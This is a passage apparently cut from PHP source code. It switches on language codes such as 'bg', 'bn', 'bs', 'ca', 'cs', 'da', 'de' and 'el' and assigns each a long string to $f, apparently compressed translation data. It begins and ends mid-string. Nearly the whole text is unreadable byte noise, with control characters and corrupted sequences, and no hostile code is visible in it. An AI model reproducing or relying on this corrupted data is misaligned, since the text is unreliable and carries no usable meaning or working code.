Z(86~j`\0]{%1NJOxOC\\ۘ\n\reAL:3:M,-PHv`9B!y5&]Zc(\"Xh\\d!!.P(w#t!}*Hjcʠt%8/grd|x;42SC{GlMdފ3.SY:Pܒ6ɞ田@Pt751\$ql~b ph/0ba;Yo\n)3YO16^w){*s)m-\"ms[CSX*PVQNN1@@\n,(.C{V\r!K?!>eNzwºj[ޜ%Nf}ߍn1?gy_+;`:[~+mEڬd\"俈ld8'nd2(a\0\0_08)X!ML\$cb>/PNHd%0lfE*mz10v\0Hi,?Z-ibOLGop\nj(`!pjIB 0bi|NG F0Pe4LilP,f&Ne\\-l\",߱B&p1.NQ#9l9?^&Xjl`91('[+0]\r1!\r+ǟ E,/L2Q[0F0-o\$2+^ޕiq0ԸoRPdHq\" HM1H,d0D ^%QRhĽO\"f\">C#[Q\$KG9 /MDX-r\\La1#fjd/*+McZ>kkжckD\" !xpzb[*HT#c#cI-Cu-\"r# `?)p`@j`rfZeb [\0Ǻ\\\"fʶeđ\nZ\0@V 2Cmnb-k:b\$n\nd %2mF]{ @@R@Wc+bb%)FDc #Z4r8\$Lf'+pq/bB\$DXb>θ\$?C# P>\n5f4R3\rྥP:K@+c1&Mi\nTK8\"hp0fT)U0 D?@E^@ \r&> k;9Cg>K_?2(ˤLP+.Nr|h(l?6F \0t @\n`";break;case"bg":$f="P\rE@4!AwhZ(&~\nfaN`D4\"]4\r;Ae2a.arp@ד|.W.X4FP\$hRs}@ЗpДB4sE7f&E,iX\nFC1l7cMEo)_G_<Gӭ},k놊qPX}F+97iZ贚iQ_aZ*n^S9YV~]X\\R6}j} l4v=HD겹%>L*H8@P|.3dm X3!r'HS1k6A>¦65 ܸkJ&j\"K9{/^:Df5Mb(<Oh(GZi4=Λ-bk1l#j4-jAA1cA/KƁ>BOK\r%4!1<h1\\hF\nOK8\0Px0@2D49Ax^;p2\rH2Ap9x7ZkcHlA\00ڃ(_0XD #h6m:xpA{@2\\Cx@:c(@)\"`m4УSS4O;*tᬏI7m.RGC\rY->1RJ&#U+h5+䬁զ>GQ):0I+W555J/qU/.u7[S0h[a)zM0EF0HJpípV䖍\"#eqrɩ:'zG.[<O\$ǠV&!LB>Av_N9VSJ`^ehUyѦ;/o{U,}SJ;ʝsZ&!Lg`[B~(]>7i+g<}bƕ2m%~`\n\r953N(=!\n8mהt\r13Ĭ7|I(Gd42(} \r0PZ\"2\n,n㎿Z!bEe ^b2/&=juUSUZ&0ZF#D Cʩ>GK&\"Jo~;@s('PDyP'n{8\r6BI\n.\$& )bVRQDRN@)B)-IQqOPI܆I#/#aT+2q[vUXkcVzZkUkqUJ]hC.UO,_+~9(\$V1'4~E)&e:\"8-çv)\0_YpSTw`/FܩJ 9Lr{\$\$\r#\" RA;@PFIdvi\0(-̓@ӜgSgRL|Lb |ģ!Ř觥\\gL%'FDDj*N?k\"1x`e- EwIKp@VbZjT'>Ϟc\n1PQQ,NV#T?.!D\n!*'=Ejq\\e7>\"KKeKE9NKMSL\rPC%;:sq/&x;XX[\r,еCk0TD2؈RsV#7TyPb'GqG)QCȡ)='g1JU*K\r4\\<rfB NSSibƧ?3p`>4fxa~gL[4 a<s1\$5ժG5}P[nPU߅,U^9xɻUypS'm/J\rDqtmb5R\\vRgȕBe^a1跃q*+UQ39ג1ayX\\?N;O RF*/>\\B _cC!4*X\$rW<[n,HK\rpkq=\r){ʏ#4#mMnMxxKjN'6ӔXäSBL\" >)Wn=:!^֠sCb7[\"feY+~P q5\"4!*@@ !hE#\n\r:[am[rP\"x&w֒x hhq{b4K( YD}LR1ZN%w^Dy?Es˖5heBTo:EgS\0;edמ\"ZW>P>&yb:ljkF\r/UK^Ԋ9FHBOnQC |whRˊ4:Tp \$z>`;Ln++(RzcF@@P*@BjB.b\"bk)v婰 E<gLϩ}\r,+#j.-fǎBN0\nR|~P7''nǍ&nbm0NLjxR@bbrcRTQLvO1*f;&R| υFf7FVj\nVd`(ml+=+SgƮ̱e,\$\re@т(BQFԘg0s.s0ގpf5Qc0M@6+1+H+eLPP\$c*38T2R.6R,&R0Aq oqDNI lѿq ͪSlxk&C\nC4fuc@slFDf<|Hc>lj1MЂ Hxlį1r|L<0qRBg2}T:;l.Vʒ\$2 \r\"/3gW38m4'2ѧ/5Q/(qOn'1oH'8{5ē)hFg,nrNa:3gBf&u:ar7'#\\A*~H;e ,bO\" P0'?(2Ts3بK?q!_4}Op+?B lRQ?s8 Cu;K\$Amv0dB+nbSʄ:cANvT)QGBRq);b4YG\n洙@\r}+4GL|WD\"TutvQGwK%[NU?TU\r4ѽI`GSBHDh+6Tvv&3!KS=5}QO@RS:ScKT\n%kh'Ex=UESHG7;+;f3v7t&qiW\rLw@KjIa!O% 9m_%,Vl ,d\nɯp\"WsHo\\7%N>wd.&j&F]|z [`#yEa-]aGh59&5)]19Ps Gc^l\"hX\rV/&,gKTOⶶ⣲M9JDH\njRp\0\npIXbQcsHo(jS8vHMj&|rfhǦoZ#T=[NE%CC\0qE(Ei\0VC)\\(94;:LN6}J\$U>72NAMl0ghۅ\r*\n CJM\nYCIu'LS/۫wW`ylsu1tWylyPyZBvu3pG>`bUeWE=Pq|1y6I^ϘQR)tKFEHJw<Wo{/ex&jσ7B!.Jh0+!s\nV'kMfy3Җbw*(_orȒfDBS!%>uVB>8\0";break;case"bn":$f="S)\nt]\0_ XD)L@4l5BQp 9\n\0,hSE0ba%. H\0.b2nDe*DM,OJÐvх\$:IKg5U4L Nd!u>&a\\@'JxS4PDz.SE<OSkbOafhb\0Br)QWE{KPP~9\\l*_W 7ɼ 4NQ 8'cIg2O9d0<CA:#ܺ%35!nnJmk,q@ᭋ(n+L9xkIB4< 5mn6\0j9z ,X2,(_)7*n\r%3lM \rmKKpLKC S.ILG3W9STJzDɋd6[\$K+lCTODu;ttIT҈J}F C\rYN5,aRnWF,ԲL-?+ŠpSvP\nrÔa8TAyJܒ2x`Px03:x6ƃ(\rv8<?Cp4D8:`0XD #h\r|Y79&\r/ aaHl+r\"!j}SF4|5l/_B9-͑DYp-i\"WdAwWf\"7Î-leVY3%`nuU'z=w\\LSl*Y:@;#`2k7AF/DV\n(JI|{Lէe28@}V702\$ED4O,\\@Fw #0F-,bU\0ћ4NSBD\n=L*t V)c;.@,BHEѼj\no&8;[}Du9\\B#XGX)w6?%LajħFR.uF7cyIM1Ӌd4M1uܚ%^9\0wI\r3*%l y\r<\0ȃcg9gp`o9a jA\r\nZy[tS\0FS֖ SK4j ĭƧp^\n/\nH9*ڑ#M-uvשnNZhtD\$8nPUʌ(W &q/~g7fyN 9z(`sePK/+a,-Xbe>Y%\0002Xplfɚ3fpΙ>h商ѥa\rg-&s:iu6\"dyeF3xAdq/%tf(۔؛y'}gL\0j0dT\\\0 S5\\|?b͌X\nPs@XQ}+ +Rg_ɱՐ\0S;5VP*Qa:;_J{yO4t>f+)v\"ml>N gtsE?0 h 7@iMQ\0*ZA?8K Q(6T!С[aLE. Rl(2\$5z\nQgY\r}sUWRD23dvk3 <{\0001PLG\0xf\r4f2m뽤6.]Mq@%b3Hn\nIEԣ\$cyp-,,Қ`_SdEX2*Y`ۭ)c\0\\qR{Ņ&i(Qe?\nŃeݧ5G%>aB!1J-9Rʃթ'E\\s%EVGYg\n-V87NjLvl!O6vRzz.SJV%D֫z L76x4LrMW'z^-Dg2,\n!ֆr6|^ |W3JMFg5v&Ӛ7qmr78S\r!;%\na3zQדG_ıM0P@Bpiw2SCY&67R0,\"m<֒6p7ֹ xX\nѼ/>L؍lri+FwVsjj6muF}ǧ^6rX<LQKn)\\%\n\"khDpb\r\0Aa ^v,O;`G72MiVX4OQI.x qgW< 东9m^nNSo7WFm`D&͈\n.N.pH~SMt ',V\"Fr(*uH.I\0d\n,O\0\0/()\0ȐG0:`'jӰ.oplp \rx\"nP i(wKBx(P\06|%o/B´햄vEJn\nĜ@0 [-ɚ).6r)+GT.Lqk%-`p8/J+l䱆'2k<-5M}MclblL\"ݐ\$m@jo2mg!Lp(xtp.v*-Uq\r0n6+p\"䱜pp/V}Ѱ䎯ntJn籱1oI[ohQQ2 .IxJN0:*YOd2o?B\$j%LyLcg28u;1!r\r<7'f5hM\0Ph0\nKRx%e5 ͤ2[f*XB+M]-r.2ֈڎR!R/0~y,S1M!R\r\n-2pl\$Qq0h!38ER2+ЦoQ rC*.O֥҉+1R.Bdz#o.'%p:SyǩBR(Sn-;,*95.mq0!CuH3(/S>JUCrE;\$-:Bm@B\0*LH%V3.+Aӥ'LhM\n!>Jt- 80|caMBœr!=n =.cC9!x\r #vR^/[4%(s4;W328Lp]>r?MN06J3(MJ1Ms<PbOeI0C76\n5SNQR%R44ѱO/\0U=N/>t&kHa\nzB{VVSLEpLJHGDB\nA&GPR3]Y?Q6u3ZeZ95PHrL5.pu2G02`TUjAY2~[o\nUUUFPlS\\QwVCW^(XUR\0UFt\$P>Ks=,>Qu5bGbaNS#ctƳgBJ6@կ]dز+ce4LRWfVsSK3(T-)\\6G[DiC Jm/\nhi[dS_O\nyF-P5iU iʇ6o_\\j̊H6a6Im\r\$>6ukK_hn&SeIKYi-\\+m(5j(aKW rS>*08kq\0ULso7Ǩ:v}{t;pww\n~*'WO=3>AJb,\$s@i!Rjb@@\0B\njt<w?7wվuњB ;;Sp`@k Jgvw~\0h:ï7w@ĩ\0\np:x4FB7W!܌fnZطc74F7k@WuK5pCImk\0⩄(Z\0X9\nIeynw⧬lDJKjnE>O&2WlZmE30vl\rYwU\nrdku/?@ \0B4-a t!8\$;W5y4l(|ұ8f:ֈ\08OtYmԝhc4{\n=<7\rf(7y`XCXTxwM:{B\0{v-=\"E/0wT296)LЀBtfK,uh\n`Ԇ6.Pǻ\"B?\\Nݐi9ڲ9:/>V=+r싎G@}4[2D}:IkUlb4=eVkV (K}7dEV<X@ \0t @\n`";break;case"bs":$f="D0\reLS? E34S6MƨAt7ptp@u9xN0V\"d7dp؈LAHa)̅.RL p7LX\nFC1l7AGn7(UlbeēѴ>4)yFY\n,Af -e3Nw|H\r]ŧ43XݣwA!D6eiM~}œᣘ!2M!PIWIKlm0cL@#A\024*#\n<M+p{(cZ\r*9+`R: #b!ɘ(dn&>N 9&c4p8p *0|B5(F42c0z\r8a^\\029˘ Ø7xD#R:Mn\ra|\$N\ràx!ǃD\$)2KKHFKh5`14pӌEYWc{,ôb:7\0Aq\rKpvn\rB0#5P/P:kF~\"0:@^/%j.P:XROL}xǣM3Z3x8Oꚺ:ڇq:\n2DYc[&f3Nsc[4bh<\"M_Yvm=3u+km#.l5mQPmƫh')ޢ*cpx¶94x[!CN[XL̳t72%~S4L#{Z6CODc6\r:9dC\nT ?_(P9)p2ѫĂb#j \\K˾?6:ªR2\n43p_(\r]ELCYx)\\9-A5ph0sPa{&ޜSuN;QR:RJFebR\nHƩU.TҜSʹ*%Hh U*D\$Q*N*\\}KiGnsr=ͫR\nj./E%y*-ElCC @Fhu l='#R\\ly\$a\\5GRtODq+@<K ECɚ(r6FPMS\nȐNh91,[052ɔAO\naQ FgQ0̗)BD̚Fp P7bCQvCI)C.t\0Xz!@XiA !*GFJraGȾ!Id2J\0f#^\ne;HFPO *\0BE\0ѐ63FRP &ZcLGrLR|Ѥj6jTmG3|]\0pb\"7*wKegi[P@ekcҷ\0TazfRV&~*7ۚ<58w6]cmfK%`\\pGl`7F(AH2O\"&\$:\rHA%09ib!ځN__\"f<BsG@!lqfsݛð]C/ pi.mPZ2#p,P^ZvVJS#sZAҵue#՞J;G##L)5jIbMďڵ\n37bDX/[XY\rՐAa Kunj 4\"A8F6V:C&\\#ه/Q&%`?Z\\x+/ٸ.!W4gl3q'QhP痌(j9P43K;H\\#imXE.z)%˛+r+=jѢҹY]uiY]k,㯠SІ% f#m\$ʵ!lВc\n:\r\$F\\Qtη6qPŹ:7B\nLMXgj^FY\r|S8tpX\$[ g4w|wȷPLAE{k_);5ZuRZDIFVkdZ:Gcu\"8Tg@+tboQY7AsK/\"\n%^.x72IwxK`e>9wr`;1~a9{{8{>[roO1OHrsY:9bTQ7>~Mei]\\}e[dY]AF'0npeo~h֊bB-c3lRoܪ*&n \"gm\0B\nO#谸N:ؐϠ#OAo .FF1bj^E@0ZOMnzqJV&Fh0 P|8Zgpn{p1=\"1-B@@V1\nO+2oDB|]PjC\nwF*en/Zh\n0hJ=dIedV#\$D^sPBL}Q12/i*!&r\n0dDA-hZM\n10`!C)X816au,BpГI*(q\n1\00E\nf\\>!CiВ?Q=l\\ \rt*. jD\\C_j@݀_2%(FvоXf64%1FJ7 Ď[RB23X\\/\0\$ BgP2Z &dz\rV1ĮBp9bJBPaC\0y\nX\npd(m^I.ȔG28RH-V&?X\r|:TCmIcEB6[N.h-g11L8[23\r@=0ovZ2fa,ZW&qj95CN/tې16SX^S?,sr.ȱO57505c+V@`\nF\$0'`JgfzrkD0hXD4/rL`E\n9'4'0| #\"r-m0?\0!e-.#.oP\nD+\n*";break;case"ca":$f="E9je3NCP\\33ADis9LF(d5MC @e6Ɠrd`gIhpL9Q*K5L S,W-\r<e4&\"Pb2ar\n1eyg4&Q:h4\rC MXa+\\>RLK&v3épt0Y\$l1\"P d\$SL\$y)n+OoM|)NS,,}tD\n2\r\$4쒠9I4\nb!\nH\nxcJ4hn8KN (+2 &?ZH\"1 .P#\n71#p1)(hɆYh7j7;&C(3:xEm<&\n0H^1 +b:P\"7;a|>*xAi4\r#f\0(c8Z&Ar1S!d1[eri֣M5&K˴EU<<\0HKu]ܮ6jCϜq1X?OBn3,V;/c`{B3D+%(10zR6\r~'J51nm= ZgJh2R@-9: (f#)]WWv3\0/3ZeSU2(\r8緽(\0[0Zס& \"nC.p\\OK=\nH0 MJx3?ÀpLh2ޮ'Y031VX2OĂ<8¼ۭޚ/aJc\rn@!b2l9/HN75*N.kb7O ؎LhLIl# YbHrEA%ݘЖ& h9rꭐ\$2'\nPDC\"%I)@ܥ2p%>UnTUz(FZr|N3(ܧ.^onǰNADhxPbV0vC.`Ʉh H\0P @0 D(E1BV7!L8ˉc+GRvO[)\$US4*\$\$i\$2+l\r-ctm#1/%d=U̷>dP L*dI&};PC#,+.g^X_?%%d&2(*,jG>wk0@A\0F\n;bz6j V>3#4]{5@P*ZL E Dar^cVIHK2>dxpch bvI;9d:tB^U,XOL\nM&9 (\r:'!r>2b&PZ\\~sG@\rc2M\\dNM- =Mb 7OuebmL@ICQ_oC6zS~z d1*9T6|CJU1E8y9kA7&!5.\n5;b47`}^TB2XaD6N63J+@4e9D`L(nfat\nn\$,vH4Z=wj*\"XC ecd\$ܴ6BpG]_[}~Mљ.UܭM!\"\\G4~~Qt\$PJWw\\N2ď0eH(m̨4Hhi?+(7CbU`ghQ\\͖˺Ewk0\$a\nJ&@2jP=lR9Tnm&ty&*-eZwB\$VZ0+ 6%h@M\n:)Cb!\\XB) Z4ZɥnefDhs4d+DgVgh]WָW̍371]Ezy(xY:\$pFl:〠lۏL\\%a й##(^wJp'}EMC1\r:@Rx^JjO;m۴`Ĝ_|{Kk3{\0þ\\\"rY~efloQgx,a/Exd1n\0|gwp ǯQ@]K0)\nLc)YN3؇Ùo'6eOF̭Bb\$.毥0}\\K}/COX[H[BH+NEŶg\$FĮp.V`řpb9TPX_eV¬0ƍBpc&bLp#z|J=^ im4om+(g#`DnpMjKf\r)CnZ}_ TMb#aQo6 Ay4q\n0fq\rJ5#ޓ\"h1c1J>. qpO(mr3DqmLCTPl<oD\nJL[O7Ѷ \r\nOj@k*Z{.E`g\r\"AHm0\"\nX{NZ\$-Zh0+%Z\$1cP (_P\\Ǟ\\#.P0*@L&.n d\rV}Lb`PFc\$&``#\nZv#o\$lC#))LDXf b'Ū+f%vqC==FC°1`r<lL)va1fn\$(BdҊ:`0jn2@iE\0ld\\O#>(73+|r:v(4#y4o4Cz#M\"rv{H=l'4dcEdǴ40n% sS9&ꎸ 6!F&Bj7c?2\0ſ,nr2\0003s=\\Fڏ-@J4D\r\$6 fJl`DBX \0@ t\n`";break;case"cs":$f="O8'c!~\nfaN2\rC2i6Qh90'Hib7ii6ȍA;͆Y@v2\r&yHsJGQ8%9e:L:e2Zt@\nFC1l7AP4Tت;j\nbdWeHa1M̬Ne^/J-{JplPDle2bcu:F\rbʻP77LDn[?j1FU5/r(?y\$ߝִͦJMxɊ(So\04u=\n 1c(*\n99*^:42Xa8 QF&0B#Z:0ҞM0))J(6c\nc(\r(<\09C,6B@\rkZ-\r#CPm\n/5\$Nx(@!\0(R87\03:xM6\\x97MxK9\"/QX5A`8'r a^0ؠ@敊㢋-\rs7Xש`P7CkH77\\W%ҷ5{V\"M @1/~Eh8*D`P!LB` 02LXar&VK<0]ϑd1hv52t4Ң-O23z84dDX0m<`5/\"a/:VM .VcŰC{];{j̅\\w.RYh\rTwĕ/1S(\$- #j\$91b(\"sy3I֓6[:27X2P3kᷨN7\r[zkA?N]\0?k5%oTs`392zH{Peoë|Oyĝ6O\04c+|%4DQXt&xS\nAN;|!x!n|MDh;.eSK7F+{4S|G>bHK(̹\"jB_EqXŐ\rTc.djAI)E,ҜSϥQ*ELQ<Y+ElºWЬHJX%e2T\$4E ;A*F%ʀ,̋HN {\$b|Ge\n)j}3BTH\n\0`L!ZE0(*\0[,bj\"6Z0B<.ą猗fe;g}KrtMaZw1|}PJ^5@%WȑS\rr\$i{ B@@g:3v앾@0gP(+ =>\0UCޡfu7k\n3S#T!dk}J:\"\n&RNUis1L@H0m\r`6%&\rGzVJ0i&赒VOC\"GO8cJih!\nt,ML=iC+-pqRLa:H-W.w\039rLI+q)^/`w hő\0h#q>vIfWdN>aOę.V%%ڸąި\\GWv_HR1ҫbUE=KڛoNT-]05sPȮ3tl.Qט4KX\nD(Bj_XO<{.j_9hK\rjU\r4=MVPp\n8\"BCŴo#|Bd>A¿+h6k+N#HZ+i:ݪ5åq1kfJ3~`CT2)suN9ւ ;E@C ^c4q.!vnAKՂ\"{E\rl >u\rl27HMG\"ȽY[R`.cMu`:zԛ+qfn8ns RasLʧjew(\nP6{+puM5J=ŰcGP }bou!~ґYN愋NnRPVUJԪsG\0wȹR7`S:&ѥ]6i0Ӄm]li(ĥ#Éܺ1gWѿF9%&'M_/'&/?=M[ysJε0o<#jжgaWjk0D@().@i\niZ-q4ؽBENf('G4\0ALa@1\0Qmz\$>Ц+<Ǣ N#XO o켐\0/60P\nl|\"4OH4rg\"r>O`Ҏ*p*G04'CO. 0VMb<ͧm>P^>7'0h0l0pmpD\\Аc0fmMVK\n:LzՐ8P\rpD\rΎ@\rE/~2d.@eb?`Ԡe^XD@{<_A\"LheHh\$}ˤLq848\ra˯l\0\"loBva)k.4jz1p0sh0'X'gX]1]\0001cѩR/SqLM7B2gґI\\3bb@\"|ѯ|]@Lhel6P\n0J}\nm/dvp@p9Bʋ\n\$Hl%С^Lb\rb@pr%d\r'\0002='y(Q7)&1*bdGq+r\\bdұ LJё-.\rͱ*dRK^,΄NFtCM3.2i.p0CB>l.0##3>pC̞^R*Y5IG5\\Ɛ&T#Sl4s\\z\r7K%`#(\n<l\\Jc62\"Zw(^!\0STzi\rPfV(CDPm<=3߳<X[c(f|._1h([䪙TB-}lH>iZ\nZW;t>ShDp P={EQ\0ݓ B*\"'rf\\mE\$p1/\\F N1`#/@^F\"M.?'-I#+T5>cB:j\$knF\"F&zsܻYO\rJDTmT(&XP\r#Qz(L.N]Qh%^Jv&TAOt\$ox(\"no\nt1d\"3~.(\" 8\"<><@Ers=AO·4\rDnvv6Q(rFbx";break;case"da":$f="E9Qk5NCP\\33AADeA\"o0#cI\\\n&Mpci :IMJs:0#sBS\nNFM,8PFY80cAn8h(r4& I7S |lIFS%o7l51r(6n713/)@a:0\n]te8g:` hFAwZv\n)03h\n!~kjv-3e,k\$SVG)NS:On&^n:#'% 4{ڦ##82\"5C*\n-\0P8<(<;K`7\"czD#@*<-pp2(УT`!\0ОD42x+ڵ+8S\0079.C/I5A6͂:x(c@DdAC\nb>66\$n\nz\nX:#2UER5)'-` @1V#(j9(,\n%\$08:a1S\"0:춎\$SRPLοce[Cܵt\r9~6\$O<4l0cF3@Pshc\$Qhd}TBуeUTc#KKuU愲 P.p0(-2/*WL6vc@Va?L,%\r0͋*j: H#92c5HX&0\nu7Z(P9)838\"Јb#_yJUlێVRN&98@5c:>!)C12\$J9dQ49\$U}^\\IT'J*Jĵ.At0M,ƥLD͐8S</SPhQbΠ`14\03^P2I܇7AHT4,ܶ4\"͘pgtG\"=h7dH\"Ds6H\n\0B|P((ޓKE1<E94\\<0'\"GPoi*%Ϭ<(\"noY^s{y-l|uD4)zW X)a\nmÀ¡F7` /d\r)\"-l;'Cq\$;Ix \rfHA84&JIP( 22\r\$S/28拀e\0Rj)z3P*Y E zΐ0\n1w!C@P\\E ( 9`جb0.`{@Ss&M4&0C('x &L)5+JZ#:gң{{ge4ir\"f*}`<X1L5AFgvBI0DmɴejbtQ@Yj*RHz?\"(b:}YD3DWlBTꦺ\0HYf+ R6 (f'AN\"9g:-ڀjŬ?%ߴt-h`5R1g2&)-č+/٘ӦP 0\$>|Lj7Xd(5lp+P@ʲ7,lb1@,fn -_\0c9pp#8BXSBSRd\nvoAaЖnDsa&7uR#sQ1-Cnp7QA\n1M3b p8SXÄluw6 EMlbHzN,/*W\0H \n|dpfFhpQ2GrPzRJ.@nӆh-~E6ǒϙآ̅(DCMR)g,c.9j)@D\nY\"K51 ? REk}[aօh;%,metRMiۓPl=o#ozpiA4
x0Ӆt( srqưy <{S@k\"Լ|eca83\nsr\\\n0@NDarhlwJJh3LmPeIAF7'Jp\"VVsxJ=PFw\n6]GiZڹj| mEdG0ښ)#5Ub*tkzCx'Zo(I:Jի@6-\$T|6s@z\\t^wq^x^-9XA/{SCMSD7O~ZTY~C?/DFZ4\0g{pODܐ\0b408\nf(P@ߐJN5\"0pX@Kz\nLWO{R?}-b`3K# ihb¨ITelsŀ ef\"0yBSc@QOxp쩋Vb0J0kHčc\rV\rc\rl\"͒#>4-4ZɭJ<2\0pt FE\$(a4ьqn8(B )-:5f&m@zp|-Yf01\$/ҎÞيڈ/e._0K4(-H= *\\diQ쨣mPҩ\\Eܪ^gF\ṛ2 \rBb2*Ԯ;&XίPMbڂW\$\"lko\$%'!pˌ;w\"\")-/\"Y0,b槪s)#Y]B<cԌA.\r@";break;case"de":$f="S4@s4S%pQ \n6LSpo'C)@f2\rs)0aii6Mddb\$RCI[0cI S:y7at\$tCf4(e*,t\n%Mbe6[@rdQfa&7n9ԇCіg/* )aRA`m+G;=DY:֎QK\nc\n|j']C\\</rQӯ@ݚSJ97%?,aa#\\1J*n.2:8P:\r f-;L:;L(363 0=^p\0< +8CX#x.(&BFC56h`Q\"(#;t)cxS2L;1иc0z+9Ax^;r46(`]2z9IZ@:0`?3)A6|x*A#:\rsh\n2bHM-1Q:Cz::Ⲵ;Kڥ%ǃ((SH摏Hz!) wjZ'I%5WNGb7L`PH4r){&˄zb\$\0PJ@#:24C[jĢQ6H/U?X܍2ңeB3\r6-8);uZ%R7KLrNBsn\nSn202 SRU82¨c\"=)&)C=eH:06Q1Hb6Mp7c`]rNL\0\0À7{:% bj r.4'\nr6OJu2z\rwi9ww|az#wb\0T\r3\"+wʄdCD\"HQ y\0u|8sqK (\rƵB^Py%dMOPr1S/0;@eO(5\nJQG%\"FԢdje|TUj TdQS\$)Y`©pFs\"uBH\n\0).fVF\nrA3/*4PtQ?Ɛt\nٔBdL2NSJ*(* #>ב^@X;tAW 0aʓn >(h^NFU\n-Qx_Ò.;`h)r8H4uWsD3yWM[#2(uIaZ<f҉QZ)FP\"\r%eI3\n<)@ZAА7rj`zp`QIKZ%N(tO<jXɲ`\0k)?\rK(ڼ 0T\n瑗F\rR#|IPO2o̙f>/SːNT(@-(A&[)Y:V%ÂDTdttZʿv)>l:8Heg̰8mb5Bڌqwu198iiN܃*!6FAұVf(K[/Ng*Š lPѡB~#68'MEA#L\n%b|fn An&m&d]8gHil[S6WS u#`AVxӨCB6V-]ɑ4ZPi tc*e\"Xurk7EBD ISWn )Ldj\\c-pFÅ@@ 0ٛz@]IIor6)0IO'e9]PC\$Йn\\ˡ3@NVE##æԋSjduؤjHCKUu܄^_]Fpz_\"NRlg[e]'77jR(QQ3`-o\\HMrw0u#19fV\r\"sW=!\n&PgEo1ns|wʖ֗Us\0RV!s6walOSawT=8;jR9\\!l_\nJ`y=e\nJfk|1L\$?}d`*/le),3Z\0<\nlLKzMtjГMze<@6ta@5f}^{Lh.O=7/#th_&@'!_~ȼ¼m ߳0T\0\0L\0rBf\n%0 Z0\0#\0JH>-\$\$5ĖȬ*P0G*&+.\0<@ONGjPn8[l`ȌK\"4,Z@ZnZp)kEBc&pMj1%q\r\neLb#` @R h_ݨ@02nLq8>r[Hp*c \n.Jb1qj6V@2 \rfB/^i*b8P.bdoˠP3\\qE+f0K(,1ew2:\r\rGH:`\0b!MKK#O#?R\"!`q= =\r\$\nY(d]KV%pтrn\rWrt\rxG\\e╪\"dΚ.B;H)\\ö#\$ Xrl&4v\re\rV g9&\"Fc\n;pEdZ**BPTV@\np4xBL0mdC9'J3m;0,CBN.%M41CRoeRD\nB:d7#a-L~=..qĕ\"G^#D\r^@H\rР#`.<\$S.f!GB#/Bӹ9:\"y#8~9:z#BƭԻv#rQ()lj#`ArIO8GtoB31?\05\"p 'Dh22j500I'Is4Y ; D\n2b|CTZ3ɠʵ<E\$Tl䤤%#HF/b";break;case"el":$f="J=Z &r͜gY{=; E30\ng%!F3,̙i`dLIs9e'A='\nH|xVeH56@TБ:hΧg;B=\\EPTD\rd.g2MF2AV2iq+Nd*S:d[hڲG%..YJ#!j62>h\nQQ34d%Y_\\Rk_U[\nOWx:X +\\g+[Jy\"Ebw1uXK;rhs3D6%`YJF((zlܦ&s/2/%A[7[JX đKںm늕!iBdA\$*M\n@Pd0077lH桮W/Jj(\n>rϼbgfy/.J?PEWKrC)/J\"\0*bҪ;\n0:ط1\"THJDfy%)2:I.P[1tKһ%o<Ӥ(e|\$=*Qօh6K>{Ťoiv@M:D\\;5dzZjR718i@4C(C@:t<# 4(\rvX<h4pDT21\r5A6`6壠x!@`4\r&p72&\r9~.E_<rF[T\nꟾT{n7:RQ9B(Ro\nh\\9/uN2z9Q,A.19&b\rӴiZk.MNȿJ!\\7nOhr:H]#LV7\\x Rvj8k's1M7R5M34AA҉9EԮ;?Q9NzdV+ؾ\$}I2AW)ryP@!T!n?V\nn=94AJ:\r[,}=7tB.pJVeD-%c ËE*Dwrpdױ=n/_z6@H!ipD0\$w] 28VIu#E&MY9H,pȩRZ@SJCmшï!&\0& JmRqJ%XԸ TdaRJH\"E|AhYy% -aqXaRʆ\"G\"?JIhC\naH#G~b]OnϓB 42h!U#I/&IX\$٣)\n:.0]PuKQrKGԕܲ\\KvXME(T\$\"adRI\"Se{uK͆\"ثc,mB+'e,b5ݜzAhmDVrT#>2L\\K@'ԒPU蠼`SpP1TA13_*JQW`\$ٛYLI#XfL]\nzE\0\"eȄNO[6hP\0\0(0@R2%e-9K\$IH+hbaE);P\$TKJWQɆUWσ4w)Z,X\0 qD\06'!Qdgxi4a2FMIM4gSyeQ-Sq]xS\n\0W {86eabDo\$*T4Ķ\$DE+\$dDX1e2P!u*[(LPD\0.E)HHw`t*\06\0&,.JV\0cA7Z\"a9&)NqvFB_Sj#uX\"eSd(uփ9r/|!Plˈ1JZJYR;J+ʔ,M-p<\\lprTSkpaAڙgtl}v~f34WaD89XUQ:(j@ӐI֯Ż_+\$h~\$ ZHiaQR3]1nHW\\As'*6ȫrwofu[UA`Ԙ#\0o:]|K͂^_Wa- <iT%=EA&x Xdd@\"RQj덭\nWz ZF A<PnzoK3ʋqEא_X_@.DTpD9|!kcj Dy|P{\"Li.k**PBT!\$\0L\r ʮtl\0\r#\0e&b\nZھD-ϸu\0^2kK+Xt@Q#*QÈW04.e\n<,Z0\$I\"-̵ugQ\"(DU\$fԺ7hlnfN\$jpJHd<&,;)_\"\0 E*Ћ0/gPP{ 4(p P 4ҋVOTV(PMTפDq#ҚkiJHZLqB/6BEQ,=kFGhn%\$}\"(in1p@@Hop;1>[Qn2Lb5h@k.,T+0sBs%̯XHJ,D&u蜂2L]bB|Q&ZKR8KV¾K>UsFD1\"r!dXtB ! ;\"?-+\$>n!N2 C%&Ep+g\0BI&M&G+%F܌:Ed'cx0%( Vbܓ'ۣsonR,\0{(j8))18)wȞ}.Rm\"R0.&v'%beL.k,-@R-tqlJ%U2)#272(OIr2r\0\\\"r>ҋ\n}\$2%%a#SdDB46-Q6h\rs5=\"bT8ccK\nPt\$s;г\$sp;Cy;{;+p,ZdH^_6[!y8gOu?@3']4*?3A(37.C\$H,L6OOP)P;LDd@s4\$jVvB^\r=e.p&l'EHTRjB&l|ҏh-,t2R&LZ/u,Άb)e r2d+/S7SOO&OtT 4Ӧݧo4S7(cBU\$SE8.?PR.P'Dv, UCA[PI@L!@ER='UZX(|`T-R3F^*\rX\nh/8eLYY^R%#QmSK2N#O*23oQ3<:URVӛPu]RS@q&[WjHV]5r\\ÐuhdY@{6&7XU0Ra#`qE\n&vr.Ԥl2*2.rYQ)],9e)5eb%eM^VQVfo\rf3OB5UWO;gTqa;a滖fcz&tx6_Tu\$/9byR/>dX5bl+vT7ī\\cPV\$59BY^6YVeЏgn=g'`&O-R֢QYW'tV%\$LVV[t]quLWQq5%ClwcR]s&DK(.V1 s'pKcbUbzom>fESܷGD,r='y{@ fbB<g k\nfyɏ+W*:t#3*X\" h\rV`@֝\$Dk1\nO!p5VʌoќRTF+\$GFE_\nZ#&B-HX5\$R0IX+1%M@D't!_ΤLLZPq bVi`pܱRװDD UߎL!,+erLPC.XE@~\"R;9:M4E 